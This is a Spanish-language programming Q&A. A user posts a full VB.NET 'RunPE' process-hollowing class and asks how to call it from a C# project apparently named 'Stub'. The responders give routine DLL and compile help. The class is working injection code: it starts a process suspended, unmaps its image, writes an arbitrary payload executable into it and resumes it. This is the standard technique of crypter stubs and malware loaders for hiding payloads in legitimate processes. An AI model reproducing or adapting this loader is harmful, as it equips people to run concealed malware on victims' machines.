# Como usar codigo vb.net en C# usando una libreria

Tags: c#, vb.net

la pregunta es como puedo hacer para utilizar el siguiente código:

```
Class MenaPE

        '------------------------------
        'Title: MenaPE (RunPE Class)
        'Author: Menalix
        'Website: Menalix.com
        'Notice: For teaching purposes
        '------------------------------

    #Region "Static API Calls"

        Declare Function LoadLibraryA Lib "kernel32" (ByVal Name As String) As IntPtr
        Declare Function GetProcAddress Lib "kernel32" (ByVal hProcess As IntPtr, ByVal Name As String) As IntPtr
    #End Region

    #Region "Dynamic API Caller"

        Private Function CreateApi(Of T)(ByVal Name As String, ByVal Method As String) As T
            Return DirectCast(DirectCast(Runtime.InteropServices.Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(Name), Method), GetType(T)), Object), T)
        End Function

    #End Region

    #Region "Dynamic API's"

        Private Delegate Function ReadProcessMemoryParameters(ByVal hProcess As UInteger, ByVal lpBaseAddress As IntPtr, ByRef lpBuffer As Integer, ByVal nSize As IntPtr, ByRef lpNumberOfBytesWritten As IntPtr) As Boolean
        ReadOnly ReadProcessMemory As ReadProcessMemoryParameters = CreateApi(Of ReadProcessMemoryParameters)("kernel32", "ReadProcessMemory")

        Private Delegate Function CreateProcessParameters( _
        ByVal ApplicationName As String, _
        ByVal CommandLine As String, _
        ByVal ProcessAttributes As IntPtr, _
        ByVal ThreadAttributes As IntPtr, _
        ByVal InheritHandles As Boolean, _
        ByVal CreationFlags As UInteger, _
        ByVal Environment As IntPtr, _
        ByVal CurrentDirectory As String, _
        ByRef StartupInfo As STARTUPINFO, _
        ByRef ProcessInformation As PROCESS_INFORMATION) As Boolean
        Dim CreateProcess As CreateProcessParameters = CreateApi(Of CreateProcessParameters)("kernel32", "CreateProcessA")

        Private Delegate Function NtQueryInformationProcessParameters(ByVal hProcess As IntPtr, _
        ByVal ProcessInformationClass As Integer, _
        ByRef ProcessInformation As PROCESS_BASIC_INFORMATION, _
        ByVal ProcessInformationLength As UInteger, _
        ByRef ReturnLength As UIntPtr) As UInteger
        ReadOnly NtQueryInformationProcess As NtQueryInformationProcessParameters = CreateApi(Of NtQueryInformationProcessParameters)("ntdll", "NtQueryInformationProcess")

        Private Delegate Function GetThreadContext64Parameters( _
        ByVal hThread As IntPtr, _
        ByRef lpContext As CONTEXT32) As Boolean
        Dim GetThreadContext64 As GetThreadContext64Parameters = Nothing

        Private Delegate Function IsWow64ProcessParameters( _
        ByVal hProcess As IntPtr, _
        ByRef Wow64Process As Boolean) As Boolean
        ReadOnly IsWow64Process As IsWow64ProcessParameters = CreateApi(Of IsWow64ProcessParameters)("kernel32", "IsWow64Process")

        Private Delegate Function WriteProcessMemoryParameters( _
        ByVal hProcess As IntPtr, _
        ByVal lpBaseAddress As IntPtr, _
        ByVal lpBuffer As Byte(), _
        ByVal nSize As UInteger, _
        ByRef lpNumberOfBytesWritten As UInteger) As Boolean
        ReadOnly WriteProcessMemory As WriteProcessMemoryParameters = CreateApi(Of WriteProcessMemoryParameters)("kernel32", "WriteProcessMemory")

        Private Delegate Function NtUnmapViewOfSectionParameters( _
        ByVal hProcess As IntPtr, _
        ByVal pBaseAddress As IntPtr) As UInteger
        ReadOnly NtUnmapViewOfSection As NtUnmapViewOfSectionParameters = CreateApi(Of NtUnmapViewOfSectionParameters)("ntdll", "NtUnmapViewOfSection")

        Private Delegate Function VirtualAllocExParameters( _
        ByVal hProcess As IntPtr, _
        ByVal lpAddress As IntPtr, _
        ByVal dwSize As UInteger, _
        ByVal flAllocationType As UInteger, _
        ByVal flProtect As UInteger) As IntPtr
        ReadOnly VirtualAllocEx As VirtualAllocExParameters = CreateApi(Of VirtualAllocExParameters)("kernel32", "VirtualAllocEx")

        Private Delegate Function ResumeThreadParameters( _
        ByVal hThread As IntPtr) As UInteger
        ReadOnly ResumeThread As ResumeThreadParameters = CreateApi(Of ResumeThreadParameters)("kernel32", "ResumeThread")

    #End Region

    #Region "API Structures"
        Private Structure PROCESS_INFORMATION
            Public hProcess As IntPtr
            Public hThread As IntPtr
            Public dwProcessId As UInteger
            Public dwThreadId As UInteger
        End Structure
        Private Structure STARTUPINFO
            Public cb As UInteger
            Public lpReserved As String
            Public lpDesktop As String
            Public lpTitle As String
            <Runtime.InteropServices.MarshalAs(Runtime.InteropServices.UnmanagedType.ByValArray, SizeConst:=36)> _
            Public Misc As Byte()
            Public lpReserved2 As Byte
            Public hStdInput As IntPtr
            Public hStdOutput As IntPtr
            Public hStdError As IntPtr
        End Structure
        Structure FLOATING_SAVE_AREA
            Dim Control, Status, Tag, ErrorO, ErrorS, DataO, DataS As UInteger
            <System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.ByValArray, SizeConst:=80)> Dim RegisterArea As Byte()
            Dim State As UInteger
        End Structure
        Structure CONTEXT32
            Dim ContextFlags, Dr0, Dr1, Dr2, Dr3, Dr6, Dr7 As UInteger
            Dim FloatSave As FLOATING_SAVE_AREA
            Dim SegGs, SegFs, SegEs, SegDs, Edi, Esi, Ebx, Edx, Ecx, Eax, Ebp, Eip, SegCs, EFlags, Esp, SegSs As UInteger
            <System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.ByValArray, SizeConst:=512)> Dim ExtendedRegisters As Byte()
        End Structure
        Structure PROCESS_BASIC_INFORMATION
            Public ExitStatus As IntPtr
            Public PebBaseAddress As IntPtr
            Public AffinityMask As IntPtr
            Public BasePriority As IntPtr
            Public UniqueProcessID As IntPtr
            Public InheritedFromUniqueProcessId As IntPtr
        End Structure
    #End Region

    #Region "Injection"

        Public Function Run(ByVal path As String, ByVal payload As Byte(), ByVal creationflag As Integer) As Boolean
            For I As Integer = 1 To 5
                If HandleRun(path, payload, creationflag) Then Return True
            Next
            Return False
        End Function

        Private Function HandleRun(ByVal Path As String, ByVal payload As Byte(), ByVal creationflag As Integer) As Boolean
            Dim ReadWrite As Integer = Nothing
            Dim QuotedPath As String = String.Format("""{0}""", Path)

            Dim SI As New STARTUPINFO
            Dim PI As New PROCESS_INFORMATION

            SI.cb = CUInt(Runtime.InteropServices.Marshal.SizeOf(GetType(STARTUPINFO))) 'Parses the size of the structure to the structure, so it retrieves the right size of data

            Try
                'COMMENT: Creating a target process in suspended state, which makes it patch ready and we also retrieves its process information and startup information.
                If Not CreateProcess(Path, QuotedPath, IntPtr.Zero, IntPtr.Zero, True, creationflag, IntPtr.Zero, IO.Directory.GetCurrentDirectory, SI, PI) Then Throw New Exception()

                'COMMENT: Defines some variables we need in the next process
                Dim ProccessInfo As New PROCESS_BASIC_INFORMATION
                Dim RetLength As UInteger
                Dim Context = Nothing
                Dim PEBAddress32 As Integer = Nothing
                Dim PEBAddress64 As Int64 = Nothing
                Dim TargetIs64 As Boolean = Nothing
                Dim IsWow64Proc As Boolean = False

                IsWow64Process(PI.hProcess, IsWow64Proc) 'COMMENT: Retrieves Boolean to know if target process is a 32bit process running in 32bit system, or a 32bit process running under WOW64 in a 64bit system.
                If IsWow64Proc Or IntPtr.Size = 4 Then 'COMMENT: Checks the Boolean retrieved from before OR checks if our calling process is 32bit
                    Context = New CONTEXT32
                    Context.ContextFlags = &H1000002L 'COMMENT: Parses the context flag CONTEXT_AMD64(&H00100000L) + CONTEXT_INTEGER(0x00000002L) to tell that we want a structure of a 32bit process running under WOW64, you can see all context flags in winnt.h header file.
                    If IsWow64Proc AndAlso IntPtr.Size = 8 Then 'COMMENT: Checks if our own process is 64bit and the target process is 32bit in wow64
                        GetThreadContext64 = CreateApi(Of GetThreadContext64Parameters)("kernel32", "Wow64GetThreadContext") 'COMMENT: Retrieves a structure of information to retrieve the PEBAddress to later on know where we gonna use WriteProcessMemory to write our payload
                        If Not GetThreadContext64(PI.hThread, Context) Then Throw New Exception
                        Console.WriteLine(Context.Ebx)
                        PEBAddress32 = Context.Ebx
                        TargetIs64 = False
                    Else 'COMMENT: If our process is 32bit and the target process is 32bit we get here. 
                        NtQueryInformationProcess(PI.hProcess, 0, ProccessInfo, Runtime.InteropServices.Marshal.SizeOf(ProccessInfo), RetLength) 'COMMENT: Retrieves a structure of information to retrieve the PEBAddress to later on know where we gonna use WriteProcessMemory to write our payload
                        PEBAddress32 = ProccessInfo.PebBaseAddress
                        TargetIs64 = False
                    End If
                Else 'COMMENT: If our process is 64bit and the target process is 64bit we get here. 
                    NtQueryInformationProcess(PI.hProcess, 0, ProccessInfo, Runtime.InteropServices.Marshal.SizeOf(ProccessInfo), RetLength) 'COMMENT: Retrieves a structure of information to retrieve the PEBAddress to later on know where we gonna use WriteProcessMemory to write our payload
                    PEBAddress64 = ProccessInfo.PebBaseAddress
                    TargetIs64 = True
                End If


                Dim BaseAddress As IntPtr
                If TargetIs64 = True Then
                    ReadProcessMemory(PI.hProcess, PEBAddress64 + &H10, BaseAddress, 4, ReadWrite) 'COMMENT: Reads the BaseAddress of a 64bit Process, which is where the exe data starts
                Else
                    ReadProcessMemory(PI.hProcess, PEBAddress32 + &H8, BaseAddress, 4, ReadWrite) 'COMMENT: Reads the BaseAddress of a 32bit Process, which is where the exe data starts
                End If

                Dim PayloadIs64 As Boolean = False
                Dim dwPEHeaderAddress As Integer = BitConverter.ToInt32(payload, &H3C) 'COMMENT: Gets the PEHeader start address
                Dim dwNetDirFlags As Integer = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H398) 'COMMENT: Gets the .NET Header Flags value to determine if its a AnyCPU Compiled exe or not
                Dim wMachine As Integer = BitConverter.ToInt16(payload, dwPEHeaderAddress + &H4) 'COMMENT: Gets the reads the Machine value

                If wMachine = 8664 Then : PayloadIs64 = True 'Checks the Machine value to know if payload is 64bit or not"
                Else : PayloadIs64 = False : End If

                If PayloadIs64 = False Then
                    If dwNetDirFlags = &H3 Then 'To make sure we don't rewrite flags on a Payload which is already AnyCPU Compiled, it will only slow us down
                        Buffer.SetByte(payload, dwPEHeaderAddress + &H398, &H1) 'Replaces the .NET Header Flag on a 32bit compiled payload, to make it possible doing 32bit -> 64bit injection
                    End If
                End If

                Dim dwImageBase As Integer
                If PayloadIs64 = True Then
                    dwImageBase = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H30) 'Reads the ImageBase value of a 64bit payload, it's kind of unnessecary as ImageBase should always be: &H400000, this is the virtual addressstart location for our exe in its own memory space
                Else
                    dwImageBase = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H34) 'Reads the ImageBase value of a 32bit payload, it's kind of unnessecary as ImageBase should always be: &H400000, this is the virtual address start location for our exe in its own memory space
                End If

                If dwImageBase = BaseAddress Then 'COMMENT: If the BaseAddress of our Exe is matching the ImageBase, it's because it's mapped and we have to unmap it
                    If Not NtUnmapViewOfSection(PI.hProcess, BaseAddress) = 0 Then Throw New Exception() 'COMMENT: Unmapping it
                End If

                Dim dwSizeOfImage As Integer = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H50)
                Dim dwNewImageBase As Integer = VirtualAllocEx(PI.hProcess, dwImageBase, dwSizeOfImage, &H3000, &H40) 'COMMENT: Makes the process ready to write in by specifying how much space we need to do it and where we need it
                If dwNewImageBase = 0 Then Throw New Exception()

                Dim dwSizeOfHeaders As Integer = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H54)
                If Not WriteProcessMemory(PI.hProcess, dwNewImageBase, payload, dwSizeOfHeaders, ReadWrite) Then Throw New Exception() 'Writes the size of the payloads PE header to the target

                'COMMENT: This is here where most of the magic happens. We write in all our sections data, which contains our resssources, code and the information to utilize the sections: VirtualAddress, SizeOfRawData and PointerToRawData
                Dim SizeOfOptionalHeader As Short = BitConverter.ToInt16(payload, dwPEHeaderAddress + &H14)
                Dim SectionOffset As Integer = dwPEHeaderAddress + (&H16 + SizeOfOptionalHeader + &H2)
                Dim NumberOfSections As Short = BitConverter.ToInt16(payload, dwPEHeaderAddress + &H6)
                For I As Integer = 0 To NumberOfSections - 1
                    Dim VirtualAddress As Integer = BitConverter.ToInt32(payload, SectionOffset + &HC)
                    Dim SizeOfRawData As Integer = BitConverter.ToInt32(payload, SectionOffset + &H10)
                    Dim PointerToRawData As Integer = BitConverter.ToInt32(payload, SectionOffset + &H14)
                    If Not SizeOfRawData = 0 Then
                        Dim SectionData(SizeOfRawData - 1) As Byte
                        Buffer.BlockCopy(payload, PointerToRawData, SectionData, 0, SectionData.Length)
                        If Not WriteProcessMemory(PI.hProcess, dwNewImageBase + VirtualAddress, SectionData, SectionData.Length, ReadWrite) Then Throw New Exception()
                    End If
                    SectionOffset += &H28
                Next

                Dim PointerData As Byte() = BitConverter.GetBytes(dwNewImageBase)
                If TargetIs64 = True Then
                    If Not WriteProcessMemory(PI.hProcess, PEBAddress64 + &H10, PointerData, 4, ReadWrite) Then Throw New Exception() 'Writes the new etrypoint for 64bit target
                Else
                    If Not WriteProcessMemory(PI.hProcess, PEBAddress32 + &H8, PointerData, 4, ReadWrite) Then Throw New Exception() 'Writes the new entrypoint for 32bit target
                End If
                If ResumeThread(PI.hThread) = -1 Then Throw New Exception() 'Resumes the suspended target with all its new exciting data

            Catch ex As Exception
                Dim P As Process = Process.GetProcessById(CInt(PI.dwProcessId))
                If P IsNot Nothing Then P.Kill()
                Return False
            End Try

            Return True
        End Function
    #End Region

    End Class
```

Que tendría que poner para usarlo en una librería o dll, o solamente tengo que poner clase, generar la dll y hacer la llamada a mi clase? gracias?

Intente de esta manera pero no funciono:
[image: introducir la descripción de la imagen aquí]

[image: introducir la descripción de la imagen aquí]

Comment: No es mejor adaptar tu codigo Vb a C# ? o mas rapido, convertirlo?
usa esta herramienta de conversion de codigo VB a C# http://converter.telerik.com/

Comment: crea una librería de clases en un proyecto independiente y generas la dll y luego agregas la referencia en tu proyecto actual. revisa este [link](https://joshuaolguin.wordpress.com/2010/02/08/como-crear-e-implementar-una-dll-con-visual-studio-y-c/)

Comment: @LuisAcuña pon tu comentario como respuesta (añadiendo los detalles importantes del enlace). Lo menos que vas a conseguir es un +1 por mi parte.

Comment: @AlvaroMontoro ya lo hice y me lo eliminaron porque querían que me atribuyera como propio el "paso a paso" que esta compartido en el link (que no es de mi autoria). Yo no ando "mendigando" puntos, solo quiero contribuir a encontrar una solución al interrogante planteado.

Comment: @LuisAcuña lo eliminó un moderador porque sólo pusiste el enlace sin describir nada de los pasos que hay dentro, eso se considera una respuesta de baja calidad. Copiar la idea esencial (no todo) citando la fuente no es robar, atribuirse o plagiar, es la manera correcta de hacerlo.

Comment: Has cambiado la pregunta considerablemente. Ha pasado de ser una pregunta genérica de "cómo puedo usar código vb .net en c#" a "cómo arreglo este código". Deberías haber creado una pregunta nueva porque una respuesta como la de Luis Acuña ahora deja de tener sentido cuando era totalmente válida y correcta.

Comment: No he cambiado la pregunta, la pregunta `como usar codigo vb.net en C# usando una dll o libreria` y en el siguiente parrafo pone `la pregunta es como puedo hacer para utilizar el siguiente código` solo añadi dos fotos de como lo puse.

Answer (score 0, accepted):

¿Por qué no puedes usar tu clase tal cómo está en tu método estatico? ¿que te lo impide? Vamos a ver,lo primero obviamente la clase debe ser publica, lo que creo que ya has hecho:

```
Public Class MenaPE
```

tras recompilar, desde tu aplicación en C# (da igual método estático que no) haz simplemente:

```
MenaPE.MenaPE mena = new MenaPE.MenaPE();
mena.Run(tusargumentos);
```

Para llamar a un método no estático, hay que crear lo primero una instancia de la clase, para posteriormente llamar al método.

---

Si lo que quieres es que la clase vb.net sea estática, lo que debes hacer es en lugar de usar una clase (`Class`) usar un Módulo (`Module`):

```
Public Module MenaPE
```

Y entonces ya podrías usarlo como:

```
MenaPE.MenaPE.Run(....
```

Comment: Ya he intentado eso pero siempre me muestra The type or namespace name 'MenaPE' could not be found (are you missing a using directive or an assembly reference?) (CS0246) - C:\Users\Androide\Desktop\ - Copy - Copy\Stub\Program.cs:26,30 y pienso porque no este en shared el método o no se.

Comment: Necesitamos saber como se llama el proyecto vb.net donde generaste la dll. Yo simplemente cree un proyecto libreria de clases vb.net y lo llame MenaPE. Despues cree la clase MenaPE,pegue tu código y generé la dll. Finalmente,en el proyecto de consola,agregue la referencia a esa dll y con el codigo que te pongo en la respuesta funciona perfectamente

Comment: Obviamente,pegue tu codigo añadiendo `Public` a la clase

Comment: Como ves en las fotos yo pusé Public también y añadi la librería en referencias, y la invoque igual sin embargo siempre me muestra el mismo error `The type or namespace name 'MenaPE' could not be found (are you missing a using directive or an assembly reference?) (CS0246) - C:\Users\Androide\Desktop\ - Copy - Copy\Stub\Program.cs:26,30` si no si pudieras ponerlo en github chekearia alo mejor este equivocado pero ya lo intente bastantes veces y me muestra el mismo error. Y pense que era por los métodos ya que hice exactamente lo mismo añadi public por supuesto.

Comment: Ok,te lo subire a algun sitio,pero es tan sencillo que siguiendo los pasos que te he dicho tiene que funcionar sin problemas.

Comment: @OmarOmar he subido los dos proyectos [aqui](https://expirebox.com/files/810a706a3608af52a56f4bf1bb1e68f1.zip). Supongo que tendrás que agregar la referencia a la dll en el proyecto de consola antes de probarlo

Comment: Pienso que sea algun problema con mi proyecto,ya que en el tuyo funciono. una pregunta, en el método usaba estática porque intentaba que la librería fuera estática, no es posible usarla como librería estática?

Comment: Claro. Pero entonces,en lugar de una clase, debes añadir un Modulo,pegar el código vb y ponerlo como public

Comment: Cuando como librería estática, aun así me sigue pidiendo la dll, cuando decia dll estática me referia a que ya se incluye en mi programa la libreria estática.

Comment: No se a que te refieres con que se incluya en tu programa (eso no es estatico). lo que puedes hacer es,en tu solucion,añadir un proyecto vb.net en lugar de tenerlo en otro,y referenciar en tu proyecto principal al proyecto vb.net,no se si te refieres a eso

Comment: si me refiero a que se compilen juntos no por separado. que la librería este dentro de mi programa.

Comment: Pues haz lo que te he dicho. Simplemente añade un nuevo proyecto a tu solucion de tipo vb.net,le pegas el codigo vb.net y cambia las referencias a ese nuevo proyecto

Comment: estaba intentando ponerlo como linkeado static por lo que probe con .netmodule y añadirlo, lo que intentaba era que añadir la librería de manera estática.

Comment: Echa un vistazo a [ILMerge](https://www.microsoft.com/en-us/research)

Comment: vi un comportamiento inusual en el programa al usarlo como libreria: [img]http://i.imgur.com/4DJ6q5e.png[/img] que no se puede apreciar cuando lo uso nativo en vb.net es normal que ocurra esto cuando usas un proyecto en este caso el que puse de MenaPE como libreria? tal vez el codigo no seá 100 % funcional?

Answer (score 2):

Puedes seguir estos pasos:

1. Crea un nuevo proyecto en Visual Studio.
2. Escoge el lenguaje (C# o VB.Net, en tu caso VB.Net).
3. Escoge en tipo de proyecto el de "Biblioteca de clases" (Class Library).
4. Ahí crea tu clase y pon tu código
5. Compila el proyecto y te generará una `dll`

Ahora esa `dll` la vas a referenciar en tu otro proyecto para poder acceder a sus métodos y funciones. Aquí puedes ver un [tutorial](https://joshuaolguin.wordpress.com/2010/02/08/como-crear-e-implementar-una-dll-con-visual-studio-y-c/) más detallado sobre cómo hacerlo.

Comment: Lo intente y me pone `Gravedad Código Descripción Proyecto Archivo Línea Estado de supresión
Error CS0120 Se requiere una referencia de objeto para el campo, método o propiedad 'MenaPE.Run(string, byte[], int)' no estáticos skip C:\Users\Androide\Desktop\- Copy - Copy\Stub\Program.cs 25 Activa` osea que deben de ser no estáticas porque mi main es estático pero como puedo poner la clase estatica y referenciarla, ya que si la pongo como dll no me deja poner public static class, como hago para que mi clase sea estatica ya que en mi dll no puedo declararla estatica y lo usare en el main static

Comment: No sé si deba abrir otra pregunta o haya hecho bien actualiznado la pregunta, gracias.

Comment: Has intentado creando una instancia de tu clase desde el formulario? MenaPE mp = new MenaPE();

Comment: me pone Gravedad Código Descripción Proyecto Archivo Línea Estado de supresión
`Error CS0118 'MenaPE' es espacio de nombres pero se usa como tipo skip C:\Users\Androide\Desktop\- Copy - Copy\Stub\Program.cs 25 Activa` tengo que ponerle un namespace a mi clase?

Comment: me esta reconociendo como espacio de nombres cuando hago eso.

Comment: @OmarOmar, el nombre del proyecto, es el mismo nombre que el de la clase?

Answer (score 0):

Segun lo que puedo asimilar con la pregunta(que no es muy descriptiva en el error) y tus comentarios estas son las concluciones que puedo sacar:

Error `CS0120`: [La documentacion oficial](https://msdn.microsoft.com/es-es/library/s35hcfh7(v=vs.100).aspx) dice que este error ocurre cuando intentas acceder a un campo, propiedad o metodo de forma estatica cuando en realidad no lo es.

Ejemplo:

```
public class Clase{
 public void Hola() { Console.Write("Hola"); }
}

public class Program
{
 public static void Main()
 {
    Clase.Hola(); // error, el metodo hola no es estatico.
    new Clase().Hola(); // ahora si funciona, porque estamos creando una instancia
 }
```

}

Error `CS0118`: [Segun la documentacion en ingles](https://docs.microsoft.com/en-us/dotnet/csharp/misc/cs0118)(no la encontre en español) estas utilizando un namespace(espacio de nombre) *como una clase*. Segun puedo notar es que tu proyecto tiene el mismo nombre que la clase que necesitas.

Ejemplo:

```
namespace EjemploNameSpace
{
 public class EjemploNameSpace
 {
   void Saludar() { Console.Write("Hola como estas"); }
 }
}

public class Program
{
 public static void Main()
 {
   EjemploNameSpace.Saludar();// error, hola es un namespace, no una clase.
   EjemploNameSpace.EjemploNameSpace.Saludar(); // error, el metodo saludar no es estatico
   new EjemploNameSpace.EjemploNameSpace().Saludar(); // Ahora si, estas creadno una instancia y dentro del namespace EjemploNameSpace, estamos accediendo a la clase EjemploNameSpacecon el metodo Saludar() por medio a la instancia.
 }
}
```

Nota: Los ejemplos estan en c# porque no se Visual Basic pero los errores al final son los mismo.